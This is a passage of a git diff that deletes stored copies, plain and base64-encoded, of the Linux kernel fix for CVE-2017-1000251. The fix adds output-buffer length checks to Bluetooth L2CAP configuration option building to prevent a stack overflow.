mKSksIGJ1Zik7CiAJcmV0dXJuIGVycjsKIH0KIApkaWZmIC0tZ2l0IGEvbmV0L2JsdWV0b290aC9sMmNhcF9zb2NrLmMgYi9uZXQvYmx1ZXRvb3RoL2wyY2FwX3NvY2suYwppbmRleCA2ZTIyOWQxLi5hYTE3OTk5IDEwMDY0NAotLS0gYS9uZXQvYmx1ZXRvb3RoL2wyY2FwX3NvY2suYworKysgYi9uZXQvYmx1ZXRvb3RoL2wyY2FwX3NvY2suYwpAQCAtMTAzMSw3ICsxMDMxLDcgQEAKIAogCQlsMmNhcF9waShzayktPmNvbmZfc3RhdGUgfD0gTDJDQVBfQ09ORl9SRVFfU0VOVDsKIAkJbDJjYXBfc2VuZF9jbWQoY29ubiwgbDJjYXBfZ2V0X2lkZW50KGNvbm4pLCBMMkNBUF9DT05GX1JFUSwKLQkJCQlsMmNhcF9idWlsZF9jb25mX3JlcShzaywgYnVmKSwgYnVmKTsKKwkJCQlsMmNhcF9idWlsZF9jb25mX3JlcShzaywgYnVmLCBzaXplb2YoYnVmKSksIGJ1Zik7CiAJCWwyY2FwX3BpKHNrKS0+bnVtX2NvbmZfcmVxKys7CiAKIAkJcmVsZWFzZV9zb2NrKHNrKTsK
\ No newline at end of file
diff --git a/Patches/Linux_CVEs/CVE-2017-1000251/3.4/0002.patch b/Patches/Linux_CVEs/CVE-2017-1000251/3.4/0002.patch
deleted file mode 100644
index 375cecb9..00000000
--- a/Patches/Linux_CVEs/CVE-2017-1000251/3.4/0002.patch
+++ /dev/null
@@ -1,411 +0,0 @@
-From a8149a65c1db9c3980873a32e4a96331b7a61f5b Mon Sep 17 00:00:00 2001
-From: Ben Seri <ben@armis.com>
-Date: Sat, 09 Sep 2017 23:15:59 +0200
-Subject: [PATCH] Bluetooth: Properly check L2CAP config option output buffer length
-
-Validate the output buffer length for L2CAP config requests and responses
-to avoid overflowing the stack buffer used for building the option blocks.
-
-Change-Id: I7a0ff0b9dd0156c0e6383214a9c86e4ec4c0d236
-Cc: stable@vger.kernel.org
-Signed-off-by: Ben Seri <ben@armis.com>
-Signed-off-by: Marcel Holtmann <marcel@holtmann.org>
-Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
-CVE-2017-1000251
-Signed-off-by: Kevin F. Haggerty <haggertk@lineageos.org>
----
-
-diff --git a/include/net/bluetooth/l2cap.h b/include/net/bluetooth/l2cap.h
-index 9c2b735..8e281b4 100644
---- a/include/net/bluetooth/l2cap.h
-+++ b/include/net/bluetooth/l2cap.h
-@@ -670,7 +670,7 @@
- 
- u8 l2cap_get_ident(struct l2cap_conn *conn);
- void l2cap_send_cmd(struct l2cap_conn *conn, u8 ident, u8 code, u16 len, void *data);
--int l2cap_build_conf_req(struct sock *sk, void *data);
-+int l2cap_build_conf_req(struct sock *sk, void *data, size_t data_size);
- int __l2cap_wait_ack(struct sock *sk);
- 
- struct sk_buff *l2cap_create_connless_pdu(struct sock *sk, struct msghdr *msg, size_t len);
-diff --git a/net/bluetooth/l2cap_core.c b/net/bluetooth/l2cap_core.c
-index a554160..aba12f2 100644
---- a/net/bluetooth/l2cap_core.c
-+++ b/net/bluetooth/l2cap_core.c
-@@ -926,7 +926,7 @@
- 
- 			l2cap_pi(sk)->conf_state |= L2CAP_CONF_REQ_SENT;
- 			l2cap_send_cmd(conn, l2cap_get_ident(conn), L2CAP_CONF_REQ,
--						l2cap_build_conf_req(sk, buf), buf);
-+						l2cap_build_conf_req(sk, buf, sizeof(buf)), buf);
- 			l2cap_pi(sk)->num_conf_req++;
- 		}
- 
-@@ -2923,11 +2923,14 @@
- 	return len;
- }
- 
--static void l2cap_add_conf_opt(void **ptr, u8 type, u8 len, unsigned long val)
-+static void l2cap_add_conf_opt(void **ptr, u8 type, u8 len, unsigned long val, size_t size)
- {
- 	struct l2cap_conf_opt *opt = *ptr;
- 
- 	BT_DBG("type 0x%2.2x len %d val 0x%lx", type, len, val);
-+
-+	if (size < L2CAP_CONF_OPT_SIZE + len)
-+		return;
- 
- 	opt->type = type;
- 	opt->len  = len;
-@@ -3312,12 +3315,13 @@
- 	}
- }
- 
--int l2cap_build_conf_req(struct sock *sk, void *data)
-+int l2cap_build_conf_req(struct sock *sk, void *data, size_t data_size)
- {
- 	struct l2cap_pinfo *pi = l2cap_pi(sk);
- 	struct l2cap_conf_req *req = data;
- 	struct l2cap_conf_rfc rfc = { .mode = pi->mode };
- 	void *ptr = req->data;
-+	void *endptr = data + data_size;
- 
- 	BT_DBG("sk %p mode %d", sk, pi->mode);
- 
-@@ -3338,7 +3342,7 @@
- 
- done:
- 	if (pi->imtu != L2CAP_DEFAULT_MTU)
--		l2cap_add_conf_opt(&ptr, L2CAP_CONF_MTU, 2, pi->imtu);
-+		l2cap_add_conf_opt(&ptr, L2CAP_CONF_MTU, 2, pi->imtu, endptr - ptr);
- 
- 	switch (pi->mode) {
- 	case L2CAP_MODE_BASIC:
-@@ -3352,7 +3356,7 @@
- 		rfc.max_pdu_size    = 0;
- 
- 		l2cap_add_conf_opt(&ptr, L2CAP_CONF_RFC, sizeof(rfc),
--							(unsigned long) &rfc);
-+				   (unsigned long) &rfc, endptr - ptr);
- 		break;
- 
- 	case L2CAP_MODE_ERTM:
-@@ -3369,12 +3373,12 @@
- 			rfc.max_pdu_size = cpu_to_le16(pi->imtu);
- 
- 		l2cap_add_conf_opt(&ptr, L2CAP_CONF_RFC, sizeof(rfc),
--							(unsigned long) &rfc);
-+				   (unsigned long) &rfc, endptr - ptr);
- 
- 		if ((pi->conn->feat_mask & L2CAP_FEAT_EXT_WINDOW) &&
- 			pi->extended_control) {
- 			l2cap_add_conf_opt(&ptr, L2CAP_CONF_EXT_WINDOW, 2,
--					pi->tx_win);
-+					   pi->tx_win, endptr - ptr);
- 		}
- 
- 		if (pi->amp_id) {
-@@ -3382,7 +3386,7 @@
- 			struct l2cap_conf_ext_fs fs = {1, 1, 0xFFFF,
- 					0xFFFFFFFF, 0xFFFFFFFF, 0xFFFFFFFF};
- 			l2cap_add_conf_opt(&ptr, L2CAP_CONF_EXT_FS,
--				sizeof(fs), (unsigned long) &fs);
-+				sizeof(fs), (unsigned long) &fs, endptr - ptr);
- 		}
- 
- 		if (!(pi->conn->feat_mask & L2CAP_FEAT_FCS))
-@@ -3391,7 +3395,7 @@
- 		if (pi->fcs == L2CAP_FCS_NONE ||
- 				pi->conf_state & L2CAP_CONF_NO_FCS_RECV) {
- 			pi->fcs = L2CAP_FCS_NONE;
--			l2cap_add_conf_opt(&ptr, L2CAP_CONF_FCS, 1, pi->fcs);
-+			l2cap_add_conf_opt(&ptr, L2CAP_CONF_FCS, 1, pi->fcs, endptr - ptr);
- 		}
- 		break;
- 
-@@ -3406,11 +3410,11 @@
- 			rfc.max_pdu_size = cpu_to_le16(pi->imtu);
- 
- 		l2cap_add_conf_opt(&ptr, L2CAP_CONF_RFC, sizeof(rfc),
--							(unsigned long) &rfc);
-+				   (unsigned long) &rfc, endptr - ptr);
- 
- 		if ((pi->conn->feat_mask & L2CAP_FEAT_EXT_WINDOW) &&
- 			pi->extended_control) {
--			l2cap_add_conf_opt(&ptr, L2CAP_CONF_EXT_WINDOW, 2, 0);
-+			l2cap_add_conf_opt(&ptr, L2CAP_CONF_EXT_WINDOW, 2, 0, endptr - ptr);
- 		}
- 
- 		if (!(pi->conn->feat_mask & L2CAP_FEAT_FCS))
-@@ -3419,7 +3423,7 @@
- 		if (pi->fcs == L2CAP_FCS_NONE ||
- 				pi->conf_state & L2CAP_CONF_NO_FCS_RECV) {
- 			pi->fcs = L2CAP_FCS_NONE;
--			l2cap_add_conf_opt(&ptr, L2CAP_CONF_FCS, 1, pi->fcs);
-+			l2cap_add_conf_opt(&ptr, L2CAP_CONF_FCS, 1, pi->fcs, endptr - ptr);
- 		}
- 		break;
- 	}
-@@ -3431,12 +3435,13 @@
- }
- 
- 
--static int l2cap_build_amp_reconf_req(struct sock *sk, void *data)
-+static int l2cap_build_amp_reconf_req(struct sock *sk, void *data, size_t data_size)
- {
- 	struct l2cap_pinfo *pi = l2cap_pi(sk);
- 	struct l2cap_conf_req *req = data;
- 	struct l2cap_conf_rfc rfc = { .mode = pi->mode };
- 	void *ptr = req->data;
-+	void *endptr = data + data_size;
- 
- 	BT_DBG("sk %p", sk);
- 
-@@ -3457,7 +3462,7 @@
- 	}
- 
- 	l2cap_add_conf_opt(&ptr, L2CAP_CONF_RFC, sizeof(rfc),
--						(unsigned long) &rfc);
-+			   (unsigned long) &rfc, endptr - ptr);
- 
- 	if (pi->conn->feat_mask & L2CAP_FEAT_FCS) {
- 		/* TODO assign fcs for br/edr based on socket config option */
-@@ -3468,7 +3473,7 @@
- 		else
- 			pi->local_conf.fcs = L2CAP_FCS_CRC16;
- 
--		l2cap_add_conf_opt(&ptr, L2CAP_CONF_FCS, 1, pi->local_conf.fcs);
-+		l2cap_add_conf_opt(&ptr, L2CAP_CONF_FCS, 1, pi->local_conf.fcs, endptr - ptr);
- 		pi->fcs = pi->local_conf.fcs | pi->remote_conf.fcs;
- 	}
- 
-@@ -3478,11 +3483,12 @@
- 	return ptr - data;
- }
- 
--static int l2cap_parse_conf_req(struct sock *sk, void *data)
-+static int l2cap_parse_conf_req(struct sock *sk, void *data, size_t data_size)
- {
- 	struct l2cap_pinfo *pi = l2cap_pi(sk);
- 	struct l2cap_conf_rsp *rsp = data;
- 	void *ptr = rsp->data;
-+	void *endptr = data + data_size;
- 	void *req = pi->conf_req;
- 	int len = pi->conf_len;
- 	int type, hint, olen;
-@@ -3605,7 +3611,8 @@
- 			return -ECONNREFUSED;
- 
- 		l2cap_add_conf_opt(&ptr, L2CAP_CONF_RFC,
--					sizeof(rfc), (unsigned long) &rfc);
-+				   sizeof(rfc), (unsigned long) &rfc,
-+				   endptr - ptr);
- 	}
- 
- 
-@@ -3624,7 +3631,7 @@
- 			pi->omtu = mtu;
- 			pi->conf_state |= L2CAP_CONF_MTU_DONE;
- 		}
--		l2cap_add_conf_opt(&ptr, L2CAP_CONF_MTU, 2, pi->omtu);
-+		l2cap_add_conf_opt(&ptr, L2CAP_CONF_MTU, 2, pi->omtu, endptr - ptr);
- 
- 		switch (rfc.mode) {
- 		case L2CAP_MODE_BASIC:
-@@ -3642,11 +3649,11 @@
- 			pi->conf_state |= L2CAP_CONF_MODE_DONE;
- 
- 			l2cap_add_conf_opt(&ptr, L2CAP_CONF_RFC,
--					sizeof(rfc), (unsigned long) &rfc);
-+					sizeof(rfc), (unsigned long) &rfc, endptr - ptr);
- 
- 			if (pi->conf_state & L2CAP_CONF_LOCKSTEP)
- 				l2cap_add_conf_opt(&ptr, L2CAP_CONF_EXT_FS,
--					sizeof(fs), (unsigned long) &fs);
-+					sizeof(fs), (unsigned long) &fs, endptr - ptr);
- 
- 			break;
- 
-@@ -3656,7 +3663,7 @@
- 			pi->conf_state |= L2CAP_CONF_MODE_DONE;
- 
- 			l2cap_add_conf_opt(&ptr, L2CAP_CONF_RFC,
--					sizeof(rfc), (unsigned long) &rfc);
-+					sizeof(rfc), (unsigned long) &rfc, endptr - ptr);
- 
- 			break;
- 
-@@ -3696,11 +3703,12 @@
- 	return ptr - data;
- }
- 
--static int l2cap_parse_amp_move_reconf_req(struct sock *sk, void *data)
-+static int l2cap_parse_amp_move_reconf_req(struct sock *sk, void *data, size_t data_size)
- {
- 	struct l2cap_pinfo *pi = l2cap_pi(sk);
- 	struct l2cap_conf_rsp *rsp = data;
- 	void *ptr = rsp->data;
-+	void *endptr = data + data_size;
- 	void *req = pi->conf_req;
- 	int len = pi->conf_len;
- 	int type, hint, olen;
-@@ -3787,13 +3795,13 @@
- 
- 		BT_DBG("mtu %d omtu %d", mtu, pi->omtu);
- 
--		l2cap_add_conf_opt(&ptr, L2CAP_CONF_MTU, 2, pi->omtu);
-+		l2cap_add_conf_opt(&ptr, L2CAP_CONF_MTU, 2, pi->omtu, endptr - ptr);
- 
- 		/* Don't allow extended transmit window to change. */
- 		if (tx_win != pi->remote_tx_win) {
- 			result = L2CAP_CONF_UNACCEPT;
- 			l2cap_add_conf_opt(&ptr, L2CAP_CONF_EXT_WINDOW, 2,
--					pi->remote_tx_win);
-+					pi->remote_tx_win, endptr - ptr);
- 		}
- 
- 		pi->remote_mps = rfc.max_pdu_size;
-@@ -3806,7 +3814,7 @@
- 		}
- 
- 		l2cap_add_conf_opt(&ptr, L2CAP_CONF_RFC,
--					sizeof(rfc), (unsigned long) &rfc);
-+					sizeof(rfc), (unsigned long) &rfc, endptr - ptr);
- 	}
- 
- 	if (result != L2CAP_CONF_SUCCESS)
-@@ -3825,11 +3833,12 @@
- 	return ptr - data;
- }
- 
--static int l2cap_parse_conf_rsp(struct sock *sk, void *rsp, int len, void *data, u16 *result)
-+static int l2cap_parse_conf_rsp(struct sock *sk, void *rsp, int len, void *data, size_t size, u16 *result)
- {
- 	struct l2cap_pinfo *pi = l2cap_pi(sk);
- 	struct l2cap_conf_req *req = data;
- 	void *ptr = req->data;
-+	void *endptr = data + size;
- 	int type, olen;
- 	unsigned long val;
- 	struct l2cap_conf_rfc rfc;
-@@ -3852,13 +3861,13 @@
- 				pi->imtu = L2CAP_DEFAULT_MIN_MTU;
- 			} else
- 				pi->imtu = val;
--			l2cap_add_conf_opt(&ptr, L2CAP_CONF_MTU, 2, pi->imtu);
-+			l2cap_add_conf_opt(&ptr, L2CAP_CONF_MTU, 2, pi->imtu, endptr - ptr);
- 			break;
- 
- 		case L2CAP_CONF_FLUSH_TO:
- 			pi->flush_to = val;
- 			l2cap_add_conf_opt(&ptr, L2CAP_CONF_FLUSH_TO,
--							2, pi->flush_to);
-+							2, pi->flush_to, endptr - ptr);
- 			break;
- 
- 		case L2CAP_CONF_RFC:
-@@ -3872,14 +3881,14 @@
- 			pi->fcs = 0;
- 
- 			l2cap_add_conf_opt(&ptr, L2CAP_CONF_RFC,
--					sizeof(rfc), (unsigned long) &rfc);
-+					sizeof(rfc), (unsigned long) &rfc, endptr - ptr);
- 			break;
- 
- 		case L2CAP_CONF_EXT_WINDOW:
- 			pi->ack_win = min_t(u16, val, pi->ack_win);
- 
- 			l2cap_add_conf_opt(&ptr, L2CAP_CONF_EXT_WINDOW,
--					2, pi->tx_win);
-+					2, pi->tx_win, endptr - ptr);
- 			break;
- 
- 		default:
-@@ -4262,7 +4271,7 @@
- 		u8 buf[128];
- 		l2cap_pi(sk)->conf_state |= L2CAP_CONF_REQ_SENT;
- 		l2cap_send_cmd(conn, l2cap_get_ident(conn), L2CAP_CONF_REQ,
--					l2cap_build_conf_req(sk, buf), buf);
-+					l2cap_build_conf_req(sk, buf, sizeof(buf)), buf);
- 		l2cap_pi(sk)->num_conf_req++;
- 	}
- 
-@@ -4320,7 +4329,7 @@
- 		l2cap_pi(sk)->conf_state |= L2CAP_CONF_REQ_SENT;
- 
- 		l2cap_send_cmd(conn, l2cap_get_ident(conn), L2CAP_CONF_REQ,
--					l2cap_build_conf_req(sk, req), req);
-+					l2cap_build_conf_req(sk, req, sizeof(req)), req);
- 		l2cap_pi(sk)->num_conf_req++;
- 		break;
- 
-@@ -4427,9 +4436,9 @@
- 
- 	/* Complete config. */
- 	if (!amp_move_reconf)
--		len = l2cap_parse_conf_req(sk, rspbuf);
-+		len = l2cap_parse_conf_req(sk, rspbuf, sizeof(rspbuf));
- 	else
--		len = l2cap_parse_amp_move_reconf_req(sk, rspbuf);
-+		len = l2cap_parse_amp_move_reconf_req(sk, rspbuf, sizeof(rspbuf));
- 
- 	if (len < 0) {
- 		l2cap_send_disconn_req(conn, sk, ECONNRESET);
-@@ -4478,7 +4487,7 @@
- 		u8 buf[64];
- 		l2cap_pi(sk)->conf_state |= L2CAP_CONF_REQ_SENT;
- 		l2cap_send_cmd(conn, l2cap_get_ident(conn), L2CAP_CONF_REQ,
--					l2cap_build_conf_req(sk, buf), buf);
-+					l2cap_build_conf_req(sk, buf, sizeof(buf)), buf);
- 		l2cap_pi(sk)->num_conf_req++;
- 	}
- 
-@@ -4575,7 +4584,7 @@
- 			/* throw out any old stored conf requests */
- 			result = L2CAP_CONF_SUCCESS;
- 			len = l2cap_parse_conf_rsp(sk, rsp->data,
--							len, req, &result);
-+							len, req, sizeof(req), &result);
- 			if (len < 0) {
- 				l2cap_send_disconn_req(conn, sk, ECONNRESET);
- 				goto done;
-@@ -5397,7 +5406,7 @@
- 				l2cap_send_cmd(pi->conn,
- 					l2cap_get_ident(pi->conn),
- 					L2CAP_CONF_REQ,
--					l2cap_build_conf_req(sk, buf), buf);
-+					l2cap_build_conf_req(sk, buf, sizeof(buf)), buf);
- 				l2cap_pi(sk)->num_conf_req++;
- 			}
- 		} else {
-@@ -6959,7 +6968,7 @@
- 	pi = l2cap_pi(sk);
- 
- 	l2cap_send_cmd(pi->conn, l2cap_get_ident(pi->conn), L2CAP_CONF_REQ,
--				l2cap_build_amp_reconf_req(sk, buf), buf);
-+				l2cap_build_amp_reconf_req(sk, buf, sizeof(buf)), buf);
- 	return err;
- }
- 
-@@ -7694,7 +7703,7 @@
- 				l2cap_pi(sk)->conf_state |= L2CAP_CONF_REQ_SENT;
- 				l2cap_send_cmd(conn, l2cap_get_ident(conn),
- 					       L2CAP_CONF_REQ,
--					       l2cap_build_conf_req(sk, buf),
-+					       l2cap_build_conf_req(sk, buf, sizeof(buf)),
- 					       buf);
- 				l2cap_pi(sk)->num_conf_req++;
- 			}
-diff --git a/net/bluetooth/l2cap_sock.c b/net/bluetooth/l2cap_sock.c
-index 6da494f..baf1af7 100644
---- a/net/bluetooth/l2cap_sock.c
-+++ b/net/bluetooth/l2cap_sock.c
-@@ -1036,7 +1036,7 @@
- 
- 		l2cap_pi(sk)->conf_state |= L2CAP_CONF_REQ_SENT;
- 		l2cap_send_cmd(conn, l2cap_get_ident(conn), L2CAP_CONF_REQ,
--				l2cap_build_conf_req(sk, buf), buf);
-+				l2cap_build_conf_req(sk, buf, sizeof(buf)), buf);
- 		l2cap_pi(sk)->num_conf_req++;
- 
- 		release_sock(sk);
diff --git a/Patches/Linux_CVEs/CVE-2017-1000251/3.4/0002.patch.base64 b/Patches/Linux_CVEs/CVE-2017-1000251/3.4/0002.patch.base64
deleted file mode 100644
index 8fbe0c27..00000000
--- a/Patches/Linux_CVEs/CVE-2017-1000251/3.4/0002.patch.base64
+++ /dev/null
@@ -1 +0,0 @@
-RnJvbSBhODE0OWE2NWMxZGI5YzM5ODA4NzNhMzJlNGE5NjMzMWI3YTYxZjViIE1vbiBTZXAgMTcgMDA6MDA6MDAgMjAwMQpGcm9tOiBCZW4gU2VyaSA8YmVuQGFybWlzLmNvbT4KRGF0ZTogU2F0LCAwOSBTZXAgMjAxNyAyMzoxNTo1OSArMDIwMApTdWJqZWN0OiBbUEFUQ0hdIEJsdWV0b290aDogUHJvcGVybHkgY2hlY2sgTDJDQVAgY29uZmlnIG9wdGlvbiBvdXRwdXQgYnVmZmVyIGxlbmd0aAoKVmFsaWRhdGUgdGhlIG91dHB1dCBidWZmZXIgbGVuZ3RoIGZvciBMMkNBUCBjb25maWcgcmVxdWVzdHMgYW5kIHJlc3BvbnNlcwp0byBhdm9pZCBvdmVyZmxvd2luZyB0aGUgc3RhY2sgYnVmZmVyIHVzZWQgZm9yIGJ1aWxkaW5nIHRoZSBvcHRpb24gYmxvY2tzLgoKQ2hhbmdlLUlkOiBJN2EwZmYwYjlkZDAxNTZjMGU2MzgzMjE0YTljODZlNGVjNGMwZDIzNgpDYzogc3RhYmxlQHZnZXIua2VybmVsLm9yZwpTaWduZWQtb2ZmLWJ5OiBCZW4gU2VyaSA8YmVuQGFybWlzLmNvbT4KU2lnbmVkLW9mZi1ieTogTWFyY2VsIEhvbHRtYW5uIDxtYXJjZWxAaG9sdG1hbm4ub3JnPgpTaWduZWQtb2ZmLWJ5OiBMaW51cyBUb3J2YWxkcyA8dG9ydmFsZHNAbGludXgtZm91bmRhdGlvbi5vcmc+CkNWRS0yMDE3LTEwMDAyNTEKU2lnbmVkLW9mZi1ieTogS2V2aW4gRi4gSGFnZ2VydHkgPGhhZ2dlcnRrQGxpbmVhZ2Vvcy5vcmc+Ci0tLQoKZGlmZiAtLWdpdCBhL2luY2x1ZGUvbmV0L2JsdWV0b290aC9sMmNhcC5oIGIvaW5jbHVkZS9uZXQvYmx1ZXRvb3RoL2wyY2FwLmgKaW5kZXggOWMyYjczNS4uOGUyODFiNCAxMDA2NDQKLS0tIGEvaW5jbHVkZS9uZXQvYmx1ZXRvb3RoL2wyY2FwLmgKKysrIGIvaW5jbHVkZS9uZXQvYmx1ZXRvb3RoL2wyY2FwLmgKQEAgLTY3MCw3ICs2NzAsNyBAQAogCiB1OCBsMmNhcF9nZXRfaWRlbnQoc3RydWN0IGwyY2FwX2Nvbm4gKmNvbm4pOwogdm9pZCBsMmNhcF9zZW5kX2NtZChzdHJ1Y3QgbDJjYXBfY29ubiAqY29ubiwgdTggaWRlbnQsIHU4IGNvZGUsIHUxNiBsZW4sIHZvaWQgKmRhdGEpOwotaW50IGwyY2FwX2J1aWxkX2NvbmZfcmVxKHN0cnVjdCBzb2NrICpzaywgdm9pZCAqZGF0YSk7CitpbnQgbDJjYXBfYnVpbGRfY29uZl9yZXEoc3RydWN0IHNvY2sgKnNrLCB2b2lkICpkYXRhLCBzaXplX3QgZGF0YV9zaXplKTsKIGludCBfX2wyY2FwX3dhaXRfYWNrKHN0cnVjdCBzb2NrICpzayk7CiAKIHN0cnVjdCBza19idWZmICpsMmNhcF9jcmVhdGVfY29ubmxlc3NfcGR1KHN0cnVjdCBzb2NrICpzaywgc3RydWN0IG1zZ2hkciAqbXNnLCBzaXplX3QgbGVuKTsKZGlmZiAtLWdpdCBhL25ldC9ibHVldG9vdGgvbDJjYXBfY29yZS5jIGIvbmV0L2JsdWV0b290aC9sMmNhcF9jb3JlLmMKaW5kZXggYTU1NDE2MC4uYWJhMTJmMiAxMDA2NDQKLS0tIGEvbmV0L2JsdWV0b290aC9sMmNhcF9jb3JlLmMKKysrIGIvbmV0L2JsdWV0b290aC9sMmNhcF9jb3JlLmMKQEAgLTkyNiw3ICs5MjYsNyBAQAogCiAJCQlsMmNhcF9waShzayktPmNvbmZfc3RhdGUgfD0gTDJDQVBfQ09ORl9SRVFfU0VOVDsKIAkJCWwyY2FwX3NlbmRfY21kKGNvbm4sIGwyY2FwX2dldF9pZGVudChjb25uKSwgTDJDQVBfQ09ORl9SRVEsCi0JCQkJCQlsMmNhcF9idWlsZF9jb25mX3JlcShzaywgYnVmKSwgYnVmKTsKKwkJCQkJCWwyY2FwX2J1aWxkX2NvbmZfcmVxKHNrLCBidWYsIHNpemVvZihidWYpKSwgYnVmKTsKIAkJCWwyY2FwX3BpKHNrKS0+bnVtX2NvbmZfcmVxKys7CiAJCX0KIApAQCAtMjkyMywxMSArMjkyMywxNCBAQAogCXJldHVybiBsZW47CiB9CiAKLXN0YXRpYyB2b2lkIGwyY2FwX2FkZF9jb25mX29wdCh2b2lkICoqcHRyLCB1OCB0eXBlLCB1OCBsZW4sIHVuc2lnbmVkIGxvbmcgdmFsKQorc3RhdGljIHZvaWQgbDJjYXBfYWRkX2NvbmZfb3B0KHZvaWQgKipwdHIsIHU4IHR5cGUsIHU4IGxlbiwgdW5zaWduZWQgbG9uZyB2YWwsIHNpemVfdCBzaXplKQogewogCXN0cnVjdCBsMmNhcF9jb25mX29wdCAqb3B0ID0gKnB0cjsKIAogCUJUX0RCRygidHlwZSAweCUyLjJ4IGxlbiAlZCB2YWwgMHglbHgiLCB0eXBlLCBsZW4sIHZhbCk7CisKKwlpZiAoc2l6ZSA8IEwyQ0FQX0NPTkZfT1BUX1NJWkUgKyBsZW4pCisJCXJldHVybjsKIAogCW9wdC0+dHlwZSA9IHR5cGU7CiAJb3B0LT5sZW4gID0gbGVuOwpAQCAtMzMxMiwxMiArMzMxNSwxMyBAQAogCX0KIH0KIAotaW50IGwyY2FwX2J1aWxkX2NvbmZfcmVxKHN0cnVjdCBzb2NrICpzaywgdm9pZCAqZGF0YSkKK2ludCBsMmNhcF9idWlsZF9jb25mX3JlcShzdHJ1Y3Qgc29jayAqc2ssIHZvaWQgKmRhdGEsIHNpemVfdCBkYXRhX3NpemUpCiB7CiAJc3RydWN0IGwyY2FwX3BpbmZvICpwaSA9IGwyY2FwX3BpKHNrKTsKIAlzdHJ1Y3QgbDJjYXBfY29uZl9yZXEgKnJlcSA9IGRhdGE7CiAJc3RydWN0IGwyY2FwX2NvbmZfcmZjIHJmYyA9IHsgLm1vZGUgPSBwaS0+bW9kZSB9OwogCXZvaWQgKnB0ciA9IHJlcS0+ZGF0YTsKKwl2b2lkICplbmRwdHIgPSBkYXRhICsgZGF0YV9zaXplOwogCiAJQlRfREJHKCJzayAlcCBtb2RlICVkIiwgc2ssIHBpLT5tb2RlKTsKIApAQCAtMzMzOCw3ICszMzQyLDcgQEAKIAogZG9uZToKIAlpZiAocGktPmltdHUgIT0gTDJDQVBfREVGQVVMVF9NVFUpCi0JCWwyY2FwX2FkZF9jb25mX29wdCgmcHRyLCBMMkNBUF9DT05GX01UVSwgMiwgcGktPmltdHUpOworCQlsMmNhcF9hZGRfY29uZl9vcHQoJnB0ciwgTDJDQVBfQ09ORl9NVFUsIDIsIHBpLT5pbXR1LCBlbmRwdHIgLSBwdHIpOwogCiAJc3dpdGNoIChwaS0+bW9kZSkgewogCWNhc2UgTDJDQVBfTU9ERV9CQVNJQzoKQEAgLTMzNTIsNyArMzM1Niw3IEBACiAJCXJmYy5tYXhfcGR1X3NpemUgICAgPSAwOwogCiAJCWwyY2FwX2FkZF9jb25mX29wdCgmcHRyLCBMMkNBUF9DT05GX1JGQywgc2l6ZW9mKHJmYyksCi0JCQkJCQkJKHVuc2lnbmVkIGxvbmcpICZyZmMpOworCQkJCSAgICh1bnNpZ25lZCBsb25nKSAmcmZjLCBlbmRwdHIgLSBwdHIpOwogCQlicmVhazsKIAogCWNhc2UgTDJDQVBfTU9ERV9FUlRNOgpAQCAtMzM2OSwxMiArMzM3MywxMiBAQAogCQkJcmZjLm1heF9wZHVfc2l6ZSA9IGNwdV90b19sZTE2KHBpLT5pbXR1KTsKIAogCQlsMmNhcF9hZGRfY29uZl9vcHQoJnB0ciwgTDJDQVBfQ09ORl9SRkMsIHNpemVvZihyZmMpLAotCQkJCQkJCSh1bnNpZ25lZCBsb25nKSAmcmZjKTsKKwkJCQkgICAodW5zaWduZWQgbG9uZykgJnJmYywgZW5kcHRyIC0gcHRyKTsKIAogCQlpZiAoKHBpLT5jb25uLT5mZWF0X21hc2sgJiBMMkNBUF9GRUFUX0VYVF9XSU5ET1cpICYmCiAJCQlwaS0+ZXh0ZW5kZWRfY29udHJvbCkgewogCQkJbDJjYXBfYWRkX2NvbmZfb3B0KCZwdHIsIEwyQ0FQX0NPTkZfRVhUX1dJTkRPVywgMiwKLQkJCQkJcGktPnR4X3dpbik7CisJCQkJCSAgIHBpLT50eF93aW4sIGVuZHB0ciAtIHB0cik7CiAJCX0KIAogCQlpZiAocGktPmFtcF9pZCkgewpAQCAtMzM4Miw3ICszMzg2LDcgQEAKIAkJCXN0cnVjdCBsMmNhcF9jb25mX2V4dF9mcyBmcyA9IHsxLCAxLCAweEZGRkYsCiAJCQkJCTB4RkZGRkZGRkYsIDB4RkZGRkZGRkYsIDB4RkZGRkZGRkZ9OwogCQkJbDJjYXBfYWRkX2NvbmZfb3B0KCZwdHIsIEwyQ0FQX0NPTkZfRVhUX0ZTLAotCQkJCXNpemVvZihmcyksICh1bnNpZ25lZCBsb25nKSAmZnMpOworCQkJCXNpemVvZihmcyksICh1bnNpZ25lZCBsb25nKSAmZnMsIGVuZHB0ciAtIHB0cik7CiAJCX0KIAogCQlpZiAoIShwaS0+Y29ubi0+ZmVhdF9tYXNrICYgTDJDQVBfRkVBVF9GQ1MpKQpAQCAtMzM5MSw3ICszMzk1LDcgQEAKIAkJaWYgKHBpLT5mY3MgPT0gTDJDQVBfRkNTX05PTkUgfHwKIAkJCQlwaS0+Y29uZl9zdGF0ZSAmIEwyQ0FQX0NPTkZfTk9fRkNTX1JFQ1YpIHsKIAkJCXBpLT5mY3MgPSBMMkNBUF9GQ1NfTk9ORTsKLQkJCWwyY2FwX2FkZF9jb25mX29wdCgmcHRyLCBMMkNBUF9DT05GX0ZDUywgMSwgcGktPmZjcyk7CisJCQlsMmNhcF9hZGRfY29uZl9vcHQoJnB0ciwgTDJDQVBfQ09ORl9GQ1MsIDEsIHBpLT5mY3MsIGVuZHB0ciAtIHB0cik7CiAJCX0KIAkJYnJlYWs7CiAKQEAgLTM0MDYsMTEgKzM0MTAsMTEgQEAKIAkJCXJmYy5tYXhfcGR1X3NpemUgPSBjcHVfdG9fbGUxNihwaS0+aW10dSk7CiAKIAkJbDJjYXBfYWRkX2NvbmZfb3B0KCZwdHIsIEwyQ0FQX0NPTkZfUkZDLCBzaXplb2YocmZjKSwKLQkJCQkJCQkodW5zaWduZWQgbG9uZykgJnJmYyk7CisJCQkJICAgKHVuc2lnbmVkIGxvbmcpICZyZmMsIGVuZHB0ciAtIHB0cik7CiAKIAkJaWYgKChwaS0+Y29ubi0+ZmVhdF9tYXNrICYgTDJDQVBfRkVBVF9FWFRfV0lORE9XKSAmJgogCQkJcGktPmV4dGVuZGVkX2NvbnRyb2wpIHsKLQkJCWwyY2FwX2FkZF9jb25mX29wdCgmcHRyLCBMMkNBUF9DT05GX0VYVF9XSU5ET1csIDIsIDApOworCQkJbDJjYXBfYWRkX2NvbmZfb3B0KCZwdHIsIEwyQ0FQX0NPTkZfRVhUX1dJTkRPVywgMiwgMCwgZW5kcHRyIC0gcHRyKTsKIAkJfQogCiAJCWlmICghKHBpLT5jb25uLT5mZWF0X21hc2sg